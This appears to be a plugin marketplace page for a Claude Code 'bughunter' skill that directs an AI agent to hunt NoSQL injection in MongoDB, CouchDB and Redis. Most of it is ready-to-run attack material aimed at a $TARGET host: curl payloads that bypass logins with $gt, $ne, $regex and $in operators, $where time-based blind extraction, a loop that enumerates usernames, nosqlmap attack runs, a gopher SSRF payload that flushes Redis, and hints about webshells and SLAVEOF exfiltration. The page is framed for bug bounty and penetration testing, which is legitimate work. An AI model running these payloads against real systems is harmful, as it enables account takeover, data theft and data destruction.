Stats
Actions
Tags
From claude-bughunter
Hunts NoSQL injection vulnerabilities in MongoDB, CouchDB, and Redis, including auth bypass via operator injection ($gt, $ne, $regex), $where blind injection, and Redis command injection.
How this skill is triggered — by the user, by Claude, or both
Slash command
/claude-bughunter:hunt-nosqliThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
NoSQL injection is most valuable when it bypasses authentication (Critical) or leaks the entire user collection (High).
NoSQL injection is most valuable when it bypasses authentication (Critical) or leaks the entire user collection (High).
Highest-value chains:
{"username": {"$gt": ""}, "password": {"$gt": ""}} logs in as first user in collection (usually admin)/api/users/login POST with JSON body
/api/search?q=
/api/find?filter=
/api/query?where=
Any endpoint accepting JSON body with username/password
| Signal | Vector |
|---|---|
| MongoDB error messages in response | Operator injection |
| mongoose / monk in JS bundles | ODM patterns |
| X-Powered-By: Express | Node.js + MongoDB common stack |
| CouchDB/_utils UI exposed | Futon/Fauxton admin |
| Redis port 6379 open (via SSRF) | CONFIG SET / SLAVEOF |
| Elasticsearch :9200 open | Script injection |
# Operator injection in JSON body
curl -s -X POST https://$TARGET/api/login \
-H "Content-Type: application/json" \
-d '{"username": {"$gt": ""}, "password": {"$gt": ""}}'
# Regex wildcard — match any username
curl -s -X POST https://$TARGET/api/login \
-H "Content-Type: application/json" \
-d '{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}'
# ne (not equal) bypass
curl -s -X POST https://$TARGET/api/login \
-H "Content-Type: application/json" \
-d '{"username": "admin", "password": {"$ne": "wrong"}}'
# in array bypass
curl -s -X POST https://$TARGET/api/login \
-H "Content-Type: application/json" \
-d '{"username": {"$in": ["admin","administrator","root"]}, "password": {"$ne": "x"}}'
# Array notation (Express/PHP-style)
curl "https://$TARGET/api/users?username[$gt]=&password[$gt]="
curl "https://$TARGET/api/search?q[$regex]=.*&q[$options]=i"
# POST form data
curl "https://$TARGET/api/login" \
--data "username[$gt]=&password[$gt]="
# Test if $where is enabled (time-based detection, 5s delay)
curl -s -X POST https://$TARGET/api/search \
-H "Content-Type: application/json" \
-d '{"q": {"$where": "function(){var d=new Date();while(new Date()-d<5000){}; return true;}"}}'
# If response takes 5+ seconds → $where injection confirmed
# Blind data exfil (username starts with 'a'?)
curl -s -X POST https://$TARGET/api/search \
-H "Content-Type: application/json" \
-d '{"q": {"$where": "function(){if(this.username.match(/^a/)){sleep(3000);} return true;}"}}'
# Enumerate usernames character by character
for c in a b c d e f g h i j k l m n o p q r s t u v w x y z; do
RESP=$(curl -s -X POST https://$TARGET/api/users \
-H "Content-Type: application/json" \
-d "{\"username\": {\"\$regex\": \"^$c\"}}")
echo "$c: $(echo $RESP | wc -c)"
done
# nosqlmap
pip3 install nosqlmap
nosqlmap -u "https://$TARGET/api/login" --attack 1
# nosqlmap data extraction
nosqlmap -u "https://$TARGET/api/login" --attack 2
# If SSRF found, probe internal Redis via gopher://
curl "https://$TARGET/fetch?url=gopher://127.0.0.1:6379/_*1%0d%0a%248%0d%0aflushall%0d%0a"
# CONFIG SET webshell (if Redis has write access to web root)
# Use SLAVEOF for OOB data exfil
| Defense | Bypass |
|---|---|
| JSON.parse rejects objects | Use array: password[$ne]=x (URL params) |
Sanitizes $ | Unicode: $gt |
| Blocks operator keys | Nested objects deeper in structure |
| NoSQLi finding | Chain to | Impact |
|---|---|---|
| Auth bypass | Admin panel access | Full admin control |
| User enum via regex | Credential stuffing | Mass ATO |
| $where enabled | Arbitrary JS in DB process | Data exfil or DoS |
| Redis via SSRF | CONFIG SET / SLAVEOF | Webshell or data exfil |
✅ Auth bypass: logged in without valid credentials, received valid session token ✅ Data dump: returned users/documents you shouldn't have access to ✅ Blind injection: confirmed via time-delay (>4 seconds consistent)
Severity:
npx claudepluginhub elementalsouls/claude-bughunterDetects and exploits NoSQL injection vulnerabilities in MongoDB, CouchDB, and other NoSQL databases to demonstrate authentication bypass, data extraction, and unauthorized access risks.
Detects and exploits NoSQL injection vulnerabilities in MongoDB, CouchDB, and other NoSQL databases to demonstrate authentication bypass, data extraction, and unauthorized access risks.
Detects and exploits NoSQL injection vulnerabilities in MongoDB, CouchDB, and other NoSQL databases to demonstrate authentication bypass, data extraction, and unauthorized access during web penetration testing and API security reviews.